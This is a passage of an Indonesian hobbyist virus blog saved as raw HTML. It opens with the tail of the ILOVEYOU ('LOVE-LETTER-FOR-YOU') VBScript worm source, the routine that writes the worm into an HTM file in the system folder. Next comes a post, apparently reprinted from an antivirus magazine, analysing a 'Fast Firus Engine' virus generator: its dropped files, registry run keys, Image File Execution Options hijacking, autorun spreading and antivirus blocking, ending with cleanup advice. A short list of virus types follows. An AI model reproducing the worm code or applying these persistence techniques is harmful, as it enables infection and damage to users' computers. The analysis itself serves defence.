<br />else
<br />lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
<br />end if
<br />next
<br />set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
<br />b.close
<br />set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
<br />d.write dt5
<br />d.write join(lines,vbcrlf)
<br />d.write vbcrlf
<br />d.write dt6
<br />d.close
<br />end sub
<br /></pre>
<div style='clear: both;'></div>
</p>
<div class='endline'></div>
<p class='commentline'>
<a href='https://www.blogger.com/comment/fullpage/post/1518176830031402701/1431121314037691059' onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;'>Read Users' Comments (0)</a>
</p>
</div>
<div class='post-footer'>
<div class='post-footer-line post-footer-line-1'>
<span class='reaction-buttons'>
</span>
<span class='star-ratings'>
</span>
</div>
<div class='post-footer-line post-footer-line-2'>
</div>
<div class='post-footer-line post-footer-line-3'>
<span class='post-location'>
</span>
</div>
</div>
</div>
<div class='post-bottom'></div>
<div class='endline'></div>
<div class='post-top'></div>
<div class='post'>
<a name='7319503750550980249'></a>
<h2>
<a href='https://jangkrikvirusdago.blogspot.com/2009/10/bikin-virus-dalam-sekejap-masih-ingat.html'>bikin virus dlm sekejap</a>
</h2>
<p class='postmetadata'> 
	  Posted in  | 
	  
18.02
</p>
<div class='entry'>
<p>
<span style="color: rgb(51, 255, 255);">bikin virus dalam sekejap!!!!!!!</span><br /><br /><div style="text-align: justify; color: rgb(51, 255, 255);"><em>Masih ingat dengan <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: italic;font-family:Arial,Sans-erif;font-size:12px;"  >virus</span> Aksika? Virus “open source” <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: italic;font-family:Arial,Sans-erif;font-size:12px;"  >yang</span> satu itu memang memiliki banyak sekali varian. Tidak heran karena source code-nya memang disedia kan bebas di Internet, jadi siapapun dapat dengan mudah mengubah <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: italic;font-family:Arial,Sans-erif;font-size:12px;"  >dan</span> meng-compile source code-nya dan jadilah varian <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: italic;font-family:Arial,Sans-erif;font-size:12px;"  >baru</span>.</em></div> <p style="text-align: justify; color: rgb(51, 255, 255);">Berawal dari kemudahan itulah, banyak virus maker ataupun programer pemula mencoba–coba untuk membuat virus tanpa perlu repot. Paling yang dibutuhkan hanyalah pengetahuan seputar <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;"  >operating system</span> dan programming.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Namun kemudahan itu belum seberapa, bila dibandingkan dengan menggunakan <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;"  >program</span> Virus <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;"  >Generator</span>. Dari namanya saja, kita sudah dapat mengira kegunaan dari program tersebut. Ya, Virus Generator merupakan program untuk dapat membuat virus secara mudah dan instan.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Bermula dari sampel sebuah virus yang lumayan banyak dikirimkan oleh pembaca kepada kami. PC Media Antivirus mengenalnya dengan nama Gen.FFE-Fajar, namun antivirus lain ada <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;"  >juga</span> yang menyebutnya dengan nama Brontok.D. Dengan penyelidikan sederhana akhirnya diketahui bahwa virus tersebut dibuat menggunakan Virus Generator.</p> <p style="text-align: justify; color: rgb(51, 255, 255);"><strong>Fast Firus <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;"  >Engine</span> (FFE)</strong><br />Pembuat Generator tersebut menamakan program buatannya itu dengan nama Fast Firus Engine. Seperti yang terlihat pada program ataupun situs pembuatnya, ia memberitahukan bahwa program ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. Namun tetap saja, bila program ini sudah jatuh ke tangan yang salah, pasti akan digunakan untuk pengrusakan.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Virus Generator ini dibuat menggunakan bahasa <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;"  >Visual Basic</span> dan di-compress menggunakan packer tELock. Dalam paketnya terdapat dua buah file, yakni Fast Firus Engine.exe dan data.ex_. Fast Firus Engine. exe merupakan program utama dalam pembuatan virusnya dan sementara file data.ex_ sebenarnya merupakan badan virus asli yang belum dimodifi kasi.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Saat file Fast Firus Engine.exe dijalankan, maka pengguna akan dihadapkan pada sebuah interface. Anda hanya disuruh mengisikan nama virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate, maka jadilah virus Anda.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Cara kerja dari Generator tersebut sebenarnya sangat sederhana. Ia hanya menambahkan data yang Anda masukkan tadi ke bagian akhir file virus asli (data.ex_). Nantinya informasi tersebut digunakan oleh virus dalam proses infeksi.</p> <p style="text-align: justify; color: rgb(51, 255, 255);"><strong>Bagaimana Virus Menginfeksi?</strong><br />Virus hasil ciptaan FFE memang terlihat sederhana. Sama seperti Generatornya, ia juga dibuat menggunakan bahasa Visual Basic yang di-compile dengan metode Native- Code. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Saat virus kali pertama dieksekusi, ia akan membuat beberapa file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan terdapat file dengan nama.exe, Win32 exe, activex.exe, dan %virusname% (nama virus sesuai yang diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\ %system32%\ akan terdapat file copy.pif, _default.pif, dan surif.bin. Selain itu, ia juga mengubah atau membuat file Oeminfo.ini yang merupakan bagian dari <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;"  >System Properties</span>. Jadi apabila komputer Anda terinfeksi oleh virus hasil generate dari FFE, maka pada System Properties akan terdapat tulisan “Generated by Fast Firus Engine”.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Di direktori \%WINDOWS%\%System%\ akan terdapat beberapa file induk lagi yang menggunakan nama yang sama seperti file system milik Windows, seperti csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost. exe, dan winlogon.exe.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Dan tak lupa, pada root drive pun akan terdapat file dengan nama “baca euy.txt” yang berisikan pesan–pesan dari si pembuat virus. Jadi pada saat membuat virus dengan menggunakan Generator tersebut, maka pembuatnya akan disuguhkan beberapa kotak input, seperti Author of the virus, Name of the virus, dan Messages. Nah, isi dari kotak messages ini yang nantinya ditampilkan pada file “baca euy.txt” tersebut.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Setelah virus berhasil meng-copy-kan file induknya ke dalam sistem tersebut, ia akan menjalankan file induk tadi, sehingga pada memory akan terdapat beberapa process virus, seperti csrss.exe, winlogon.exe, lsass. exe, smss.exe, svchost.exe, dan winlogon.exe. Nama process yang mirip dengan process/services milik Windows tersebut mungkin sengaja untuk mengecoh user. Untuk membedakannya, Anda dapat melihat path atau lokasi process tersebut dijalankan. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windows yang running biasanya berasal dari direktori System32.</p> <p style="text-align: justify; color: rgb(51, 255, 255);"><strong>Mengubah Registry</strong><br />Virus ini menambahkan beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry yang diubahnya tidak akan dapat dengan mudah kita lihat karena dalam kondisi terenkripsi.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Yang ia ubah adalah seperti nilai dari item Userinit, yakni dengan menambahkan parameter ke file induk. Pada key HKEY_CURRENT_ USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan diubah itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru dengan nama present. Key HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru juga dengan nama Default dan %username%, username di sini merupakan nama user yang sedang aktif saat itu.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Virus hasil generate dari FFE juga mengubah shell extension untuk file .exe, yakni dengan mengubah type information dari Application menjadi File Folder. Setting-an folder Options juga diubah agar tidak menampilkan extension dan setiap fi le dengan attribut hidden. Dan agar dapat aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Dengan menggunakan bantuan registry Image File Execution Options, virus ini juga menambahkan item baru pada section tersebut dengan nama cmd.exe, msconfi g.exe, regedit.exe, dan taskmgr.exe. Maksudnya adalah agar setiap user yang mengakses program dengan nama file seperti itu, maka akan di-bypass oleh Windows dan dialihkan ke file induk si virus.</p> <p style="text-align: justify; color: rgb(51, 255, 255);"><strong>Bagaimana Virus Menyebar?</strong><br />Virus ini dapat menyebar melalui media penyimpan data seperti <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;"  >flash disk</span>. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk tersebut akan terdapat beberapa file baru, seperti explorer.exe, %virusname%.exe, dan msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapat running otomatis pada saat mengakses flash disk tersebut.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">File virus lainnya pun disimpan pada direktori baru di flash disk tersebut dengan nama Recycled yang berisikan file Firus.pif dan Folder.htt. Kesemua file virus tersebut dalam kondisi hidden sehingga tidak terlihat.</p> <p style="text-align: justify; color: rgb(51, 255, 255);"><strong>Virus Beraksi</strong><br />Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap program yang tidak ia inginkan seperti tools atau program antivirus termasuk PCMAV. Sama seperti halnya data registry yang diubah, data mengenai program apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Jadi, saat virus sudah stay di memory, ia akan memonitor setiap program yang diakses oleh user, yakni dengan membaca nama file dan juga caption Window. Beberapa nama file antivirus yang dicoba untuk dibloknya adalah nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa program setup atau installer juga tidak dapat dijalankan pada komputer terinfeksi.</p> <p style="color: rgb(51, 255, 255);"><strong>Pencegahan dan Penanggulangan</strong><br />PC Media Antivirus RC19 ini dapat membersihkan komputer terinfeksi secara tuntas dan akurat 100% setiap virus yang dibuat dengan menggunakan Fast Firus Generator. Untuk menghindari aksi blok oleh virus terhadap PCMAV, silakan Anda rename terlebih dahulu file PCMAV misalnya PCMAV-CLN.EXE menjadi MERDEKA.EXE.</p>
<div style='clear: both;'></div>
</p>
<div class='endline'></div>
<p class='commentline'>
<a href='https://www.blogger.com/comment/fullpage/post/1518176830031402701/7319503750550980249' onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;'>Read Users' Comments (0)</a>
</p>
</div>
<div class='post-footer'>
<div class='post-footer-line post-footer-line-1'>
<span class='reaction-buttons'>
</span>
<span class='star-ratings'>
</span>
</div>
<div class='post-footer-line post-footer-line-2'>
</div>
<div class='post-footer-line post-footer-line-3'>
<span class='post-location'>
</span>
</div>
</div>
</div>
<div class='post-bottom'></div>
<div class='endline'></div>
<div class='post-top'></div>
<div class='post'>
<a name='4581430198445554695'></a>
<h2>
<a href='https://jangkrikvirusdago.blogspot.com/2009/10/macam-virus-komputer.html'>Macam Virus KOMPUTER</a>
</h2>
<p class='postmetadata'> 
	  Posted in  | 
	  
17.45
</p>
<div class='entry'>
<p>
<table style="color: rgb(51, 255, 51);" border="0" cellpadding="4" cellspacing="0"><tbody><tr><td width="596" valign="top"><p align="center"><span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:100%;"  ><b>Macam-macam Virus Komputer                          <br /></b></span>                         </p>                                                  <!--/area Type="subhead"-->                      </td>                   </tr>                   <tr>                      <td width="592" height="20"><img alt="" height="20" src="http://alamo432.tripod.com/imagelib/sitebuilder/layout/spacer.gif" /></td>                   </tr>                   <tr>                      <td valign="top">                         <table border="0" cellpadding="2" cellspacing="0">                            <tbody><tr>                               <td width="592" valign="top">                                  <!--area Type="main"       style="0;font-family:Arial,Helvetica,sans-serif;font-size:85%;color:black;"-->                                                                    <p align="left"><span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"  ><b><b>Virus Bagle.BC</b><br />                                 <br />Virus Bagle BC ini termasuk salah satu jenis virus yang berbahaya dan telah masuk peringkat atas jenis virus yang paling cepat mempengaruhi komputer kita. Beberapa jam sejak keluarnya virus ini, sudah terdapat 2 buah varian Bagle ( Bagle BD dan BE )yang menyebar melalui e-mail, jaringan komputer dan aplikasi P2P. Virus ini menyebar melalui e-mail dengan berbagai subyek berbeda. Menurut suatu penelitian dari Panda Software virus Bagle BC ini menyusup ke dalam e-mail dengan subyek antara lain : Re:, Re:Hello, Re:Hi, Re:Thank you, Re:Thanks. Attachment-nya juga bermacam-macam, antara lain : .com, .cpl, .exe, .scr. Virus Bagle BC juga mampu untuk menghentikan kerja program-program antivirus.<br />                                 <br />                                 <br />                                   <b>Backdoor Alnica</b><br />                                 <br />Virus yang juga berbahaya ini merupakan salah satu tipe virus Trojan Horse. Merupakan salah satu virus backdoor yang jika berhasil menginfeksi komputer akan mampu melakukan akses dari jarak jauh dan mengambil segala informasi yang diinginkan oleh si penyerang. Sistem operasi yang diserang oleh virus tersebut antara lain : Windows 200, Windows 95, Windows 98, Windows Me, Windows NT dan Windows XP. Virus ini berukuran sebesar 57.856 byte.<br />                                 <br />                                 <br />                                   <b> Trojan di Linux</b><br />                                 <br />Para pengguna linux Red Hat diharapkan untuk berhati-hati terhadap PATCH yang dikirm melalui e-mail dengan alamat "security@redhat.com" karena itu sebenarnya bukannya patch security tetapi virus Trojan yang bisa mengacaukan sistem keamanan. E-mail peringatan dari Red Hat biasanya selalu dikirim dari alamat "secalert@redhat.com" dan ditandatangani secara digital. Virus ini juga pernah menyerang sistem keamanan Windows tahun 2003 dengan subyek menawarkan solusi keamanan.</b></span></p></td></tr></tbody></table></td></tr></tbody></table>
<div style='clear: both;'></div>
</p>
<div class='endline'></div>
<p class='commentline'>
<a href='https://www.blogger.com/comment/fullpage/post/1518176830031402701/4581430198445554695' onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;'>Read Users' Comments (0)</a>
</p>
</div>
<div class='post-footer'>
<div class='post-footer-line post-footer-line-1'>
<span class='reaction-buttons'>
</span>
<span class='star-ratings'>
</span>
</div>
<div class='post-footer-line post-footer-line-2'>
</div>
<div class='post-footer-line post-footer-line-3'>
<span class='post-location'>
</span>
</div>
</div>
</div>
<div class='post-bottom'></div>
<div class='endline'></div>
<!--Can't find substitution for tag [adEnd]-->
</div>
<div class='blog-pager' id='blog-pager'>
<span id='blog-pager-newer-link'>
<a class='blog-pager-newer-link' href='https://jangkrikvirusdago.blogspot.com/search?updated-max=2010-02-20T01:07:00%2B07:00&max-results=7&reverse-paginate=true' id='Blog1_blog-pager-newer-link' title='Postingan Lebih Baru'>Postingan Lebih Baru</a>
</span>
<span id='blog-pager-older-link'>
<a class='blog-pager-older-link' href='https://jangkrikvirusdago.blogspot.com/search?updated-max=2009-10-04T17:45:00%2B07:00&max-results=7' id='Blog1_blog-pager-older-link' title='Postingan Lama'>Postingan Lama</a>
</span>
<a class='home-link' href='https://jangkrikvirusdago.blogspot.com/'>Beranda</a>
</div>
<div class='clear'></div>
<div class='blog-feeds'>
<div class='feed-links'>
Langganan:
<a class='feed-link' href='https://jangkrikvirusdago.blogspot.com/feeds/posts/default' target='_blank' type='application/atom+xml'>Postingan (Atom)</a>
</div>
</div>
</div></div>
</div>
<!-- /Content -->
<!-- Sidebar -->
<div id='sidebar'>
<ul>
<!-- Welcome Message -->
<li id='about-me'>
<h2>About Me</h2>
<div class='welcome1 section' id='welcome1'><div class='widget HTML' data-version='1' id='HTML4'>
<h2 class='title'>jangkrikvirusdago's Fan Box</h2>
<div class='widget-content'>
<script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/id_ID"></script><div id="fb-root"></div>
<script>
window.fbAsyncInit = function() {
  FB.init({
    appId: "300784169572",
    xfbml: true
  });
};
(function() {
  var e = document.createElement('script'); e.async = true;
  e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js';
  document.getElementById('fb-root').appendChild(e);
}());
</script>
<fb:fan profile_id="300784169572" stream="0" connections="10" logobar="1" width="300"></fb:fan>
<div style="font-size:8px; padding-left:10px">
  <a href="http://www.jangkrikvirusdago.blogspot.com">jangkrikvirusdago</a> on Facebook
</div>
</div>
<div class='clear'></div>
</div><div class='widget Profile' data-version='1' id='Profile1'>
<h2>About Me</h2>
<div class='widget-content'>
<a href='https://www.blogger.com/profile/07274922915176382689'><img alt='Foto Saya' class='profile-img' height='80' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiivkt9Pm3ZaRjQAzyaXHumaRuI4HTYPv2b-td_uONqn0cxadU1Zlw50Pt7IpTKOvSvr1dJn19Sq3uECGrZJ8Ms4oj5RKKf875kqaJ-ELEx14sXX_dFCeacH5bprXtTZTA/s220/DSC02329.JPG' width='60'/></a>
<dl class='profile-datablock'>
<dt class='profile-data'>jangkrikvirus</dt>
<dd class='profile-textblock'>Selamat datang di blog jangkrikdago!!!!!!!!!</dd>
</dl>
<a class='profile-link' href='https://www.blogger.com/profile/07274922915176382689'>Lihat profil lengkapku</a>
<div class='clear'></div>
</div>
</div><div class='widget HTML' data-version='1' id='HTML1'>
<h2 class='title'>My facebook</h2>
<div class='widget-content'>
<!-- Facebook Badge START --><a href="http://id-id.facebook.com/people/Asep-Classic/1532637096" title="Asep Classic" target="_TOP" style="font-family: "lucida grande",tahoma,verdana,arial,sans-serif; font-size: 11px; font-variant: normal; font-style: normal; font-weight: normal; color: #3B5998; text-decoration: none;">Asep Classic</a><br /><a href="http://id-id.facebook.com/people/Asep-Classic/1532637096" title="Asep Classic" target="_TOP"><img src="http://badge.facebook.com/badge/1532637096.1662.139694753.png" width="120" height="234" style="border: 0px;" /></a><br /><a href="http://id-id.facebook.com/facebook-widgets/" title="Buat lencana Anda sendiri!" target="_TOP" style="font-family: "lucida grande",tahoma,verdana,arial,sans-serif; font-size: 11px; font-variant: normal; font-style: normal; font-weight: normal; color: #3B5998; text-decoration: none;">Buat Lencana Anda</a><!-- Facebook Badge END -->
</div>
<div class='clear'></div>
</div><div class='widget Image' data-version='1' id='Image10'>
<h2>DOWNLOAD FREE GAME POINT BLANK</h2>
<div class='widget-content'>
<a href='http://download.gemscool.com/pb/PBSetup.exe'>
<img alt='DOWNLOAD FREE GAME POINT BLANK' height='73' id='Image10_img' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAJDCUCqmACkog-DmestPDiqw-6hgpTxMm8q6TiugQl0wn6UZooAkczjm3zOuKKZFauewc0PFwjrmj_DfRBmoowCC9yypy8yJZJng-ABuFe-H6LRAgOf3c0EUVaX3nbW_m_eeHm42Iam8/s237/buttonDownload.png' width='189'/>
</a>
<br/>
</div>
<div class='clear'></div>
</div><div class='widget Image' data-version='1' id='Image11'>
<h2>FREE DOWNLOAD GAME CROSS FIRE</h2>
<div class='widget-content'>
<a href='http://www.brothersoft.com/d.php?soft_id=214279&url=http%3A%2F%2Flfiles3.brothersoft.com%2Fgames%2Fnew%2Fshooting_games%2Ffirst_person%2FCrossFire_Setup_v1045.exe'>
<img alt='FREE DOWNLOAD GAME CROSS FIRE' height='32' id='Image11_img' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnEWinHR-kvs27r4Jp3462hSWhdP7eI-doAdux2hn0Dbqa-vWyhOfZ6Bl_IbxVAkGHamN-WATtuBAsBcomTFExWplgi2YOj4q-Irdv-vmZMKETW0G3A2dZNmCSLYhE9oMfUm4RXA8ZH_Y/s237/cross_fire-214279-1275361663.jpeg' width='32'/>
</a>
<br/>
</div>
<div class='clear'></div>
</div><div class='widget Image' data-version='1' id='Image5'>
<h2>download software</h2>
<div class='widget-content'>
<a href='http://www.brothersoft.com/'>
<img alt='download software' height='89' id='Image5_img' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJODGN93b61N5CWdelpExkRqRgWfZ-MYqiZYlmaUoeSK3yjiappgs3oFXmPMp2Oq4Cuuzyj_nVP5rrssFZIPqZGiKoOtL6IReqJTaG8A_PYaPVLlD0gc2NSy9rmUNFbBn4GOacjTCqQkg/s237/logo1.gif' width='237'/>
</a>
<br/>
</div>
<div class='clear'></div>
</div><div class='widget Followers' data-version='1' id='Followers1'>
<h2 class='title'>Followers</h2>
<div class='widget-content'>
<div id='Followers1-wrapper'>
<div style='margin-right:2px;'>
<div><script type="text/javascript" src="https://apis.google.com/js/platform.js"></script>
<div id="followers-iframe-container"></div>
<script type="text/javascript">
    window.followersIframe = null;
    function followersIframeOpen(url) {
      gapi.load("gapi.iframes", function() {
        if (gapi.iframes && gapi.iframes.getContext) {
          window.followersIframe = gapi.iframes.getContext().openChild({
            url: url,
            where: document.getElementById("followers-iframe-container"),
            messageHandlersFilter: gapi.iframes.CROSS_ORIGIN_IFRAMES_FILTER,
            messageHandlers: {
              '_ready': function(obj) {
                window.followersIframe.getIframeEl().height = obj.height;
              },
              'reset': function() {
                window.followersIframe.close();
                followersIframeOpen("https://www.blogger.com/followers/frame/1518176830031402701?colors\x3dCgt0cmFuc3BhcmVudBILdHJhbnNwYXJlbnQaByM1NTU1NTUiByNhN2IwYjcqByNGRkZGRkYyByMzYTRjNjI6ByM1NTU1NTVCByNhN2IwYjdKByMwMDAwMDBSByNhN2IwYjdaC3RyYW5zcGFyZW50\x26pageSize\x3d21\x26hl\x3din\x26origin\x3dhttps://jangkrikvirusdago.blogspot.com");
              },
              'open': function(url) {
                window.followersIframe.close();
                followersIframeOpen(url);
              }
            }
          });
        }
      });
    }
    followersIframeOpen("https://www.blogger.com/followers/frame/1518176830031402701?colors\x3dCgt0cmFuc3BhcmVudBILdHJhbnNwYXJlbnQaByM1NTU1NTUiByNhN2IwYjcqByNGRkZGRkYyByMzYTRjNjI6ByM1NTU1NTVCByNhN2IwYjdKByMwMDAwMDBSByNhN2IwYjdaC3RyYW5zcGFyZW50\x26pageSize\x3d21\x26hl\x3din\x26origin\x3dhttps://jangkrikvirusdago.blogspot.com");
  </script></div>
</div>
</div>
<div class='clear'></div>
</div>
</div><div class='widget Poll' data-version='1' id='Poll1'>
<h2 class='title'>Mengapa anda tertarik melihat blog ini?</h2>
<div class='widget-content'>
<iframe allowtransparency='true' frameborder='0' height='160' name='poll-widget2414118921187359066' style='border:none; width:100%;'></iframe>
<div class='clear'></div>
</div>
</div><div class='widget Image' data-version='1' id='Image6'>
<h2>My Jodiak</h2>
<div class='widget-content'>
<a href='http://kosmo.vivanews.com/news/read/129497-horoskop_15___21_februari_2010'>
<img alt='My Jodiak' height='237' id='Image6_img' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJbqG6cabMraSr68TczF0LmGJ5FylZHKVqYcF8cpe2K34W-NTOY7lwkfL9w4f_DKS82TpplfpT9xvFYheGEIbUKY_lh4avtGa-XzY6jK-BOOIvfU1z47HvSChR-7uA0LeLj5W0NRGQCYc/s237/virgo-mg.gif' width='150'/>
</a>
<br/>
</div>
<div class='clear'></div>
</div><div class='widget Image' data-version='1' id='Image7'>
<h2>Ramalan</h2>
<div class='widget-content'>
<a href='http://www.gemintang.com/ramalan-nasib-jodoh-masa-depan/kecocokan-jodoh/'>
<img alt='Ramalan' height='31' id='Image7_img' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT8YE8qQ5TtpPA6pBa99iVpJ5vqz4w3ppxMXzL2mPGXbPJyFkdDaL_DK8QFvOyXMkqif-07UaWTrnJjWCtSmWh7T7pF8X9RqDFz10KKcPakuV90wj4x0L6XzUv65xzQmJSAR0_AW5KtTM/s237/headerbg.jpg' width='237'/>
</a>
<br/>
</div>
<div class='clear'></div>
</div><div class='widget Image' data-version='1' id='Image8'>
<h2>Cari jodoh</h2>
<div class='widget-content'>
<a href='http://www.gemintang.com/ramalan-nasib-jodoh-masa-depan/kecocokan-jodoh/'>
<img alt='Cari jodoh' height='51' id='Image8_img' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT_nrrGWvO_8eAp8Im7cvI19KCSUnus7uAd47jQiwh9LMS89mn9jyPDB3h3f1HL5wZ-ASouf45VnBo8Y9WrYNBD-sCd71Ia9IcUJIqr7lRi0t6ahw37T4ZtJJR7lhv4DX09JpsqYdcKYI/s237/logo3.gif' width='237'/>
</a>
<br/>
</div>
<div class='clear'></div>
</div>
<div class='widget HTML' data-version='1' id='HTML99'>
<p>
</p>
</div><div class='widget Image' data-version='1' id='Image9'>
<h2>free game pc download</h2>
<div class='widget-content'>
<a href='http://www.freegamepick.com/en/racing.html'>
<img alt='free game pc download' height='63' id='Image9_img' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDIi433dDGsNHwCXBgaYgDEEC_M5N2HDS5kiViH4EXFF8KgWnYj_eKmpDKwRTNPAtBAVaUzt-Hgnbg_uPn0EgzXjz4crMTJm9EbR9E82MBSlMBZbfzo2bM7wy2F8KnBeRhedo9Eff03d8/s237/logo.gif' width='237'/>
</a>
<br/>
<span class='caption'>klik gambar untuk masuk</span>
</div>
<div class='clear'></div>
</div>
<div class='widget HTML' data-version='1' id='HTML3'>
<h2 class='title'>Download free lagu</h2>
<div class='widget-content'>
<div><form method="GET" action="http://www.index-of-mp3.com/index.php" target="_blank">Masukan Nama Penyanyi - Judul Lagu<br /><input type="text" value="" name="search" maxlength="80" size="30" /><input type="submit" value="Cari Mp3 !" /><input type="hidden" name="source" value="index" checked /><br />Mesin Cari Free Download Mp3 Gratis</form></div>
</div>
<div class='clear'></div>
</div>
</div>
</li>
<!-- /Welcome Message -->
<!-- Search -->
<li>
<h2>Search</h2>
<div id='searchform'>
<form action='/search' method='get'>
<input class='searchtext' name='q' type='text' value=''/>
<input alt='Search' class='searchbutton' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXkFJVXi6NIBm4cledJVNTJ4jEWXnUJ_zDroIcbZW2sF7B7MwySdkflB1ntXe-cqFumRvgDrtKmZq5OFOheWjtn-KjmLK63BQ6HVJk3Lc-oLbZdqCFh4B1JKWloFq3FRMsMmSZ86gxwNKE/s1600/spacer.gif' type='image'/>
</form>
</div>
</li>
<!-- /Search -->
<div class='sidebar1 section' id='sidebar1'><div class='widget HTML' data-version='1' id='HTML2'>
<div class='widget-content'>
http://www.indonesiaindonesia.com/imagehosting/image7751.html
</div>
<div class='clear'></div>
</div><div class='widget BlogSearch' data-version='1' id='BlogSearch1'>
<h2 class='title'>Cari Blog Ini</h2>
<div class='widget-content'>
<div id='BlogSearch1_form'>
<form action='https://jangkrikvirusdago.blogspot.com/search' class='gsc-search-box' target='_top'>
<table cellpadding='0' cellspacing='0' class='gsc-search-box'>
<tbody>
<tr>
<td class='gsc-input'>
<input autocomplete='off' class='gsc-input' name='q' size='10' title='search' type='text' value=''/>
</td>
<td class='gsc-search-button'>
<input class='gsc-search-button' title='search' type='submit' value='Telusuri'/>
</td>
</tr>
</tbody>
</table>
</form>
</div>
</div>
<div class='clear'></div>
</div><div class='widget PageList' data-version='1' id='PageList1'>
<h2>Laman</h2>
<div class='widget-content'>
<ul>
<li>
<a href='https://jangkrikvirusdago.blogspot.com/'>Halaman Muka</a>
</li>
</ul>
<div class='clear'></div>
</div>
</div><div class='widget Label' data-version='1' id='Label1'>
<h2>Labels</h2>
<div class='widget-content list-label-widget-content'>
<ul>
<li>
<a dir='ltr' href='https://jangkrikvirusdago.blogspot.com/search/label/tips'>tips</a>
<span dir='ltr'>(1)</span>
</li>
</ul>
<div class='clear'></div>
</div>
</div><div class='widget BlogArchive' data-version='1' id='BlogArchive1'>
<h2>Blog Archive</h2>
<div class='widget-content'>
<div id='ArchiveList'>
<div id='BlogArchive1_ArchiveList'>
<ul>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

				  ► 
				
</span>
</a>
<a class='post-count-link' href='https://jangkrikvirusdago.blogspot.com/2010/'>2010</a>
<span class='post-count' dir='ltr'>(46)</span>
<ul>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

				  ► 
				
</span>
</a>
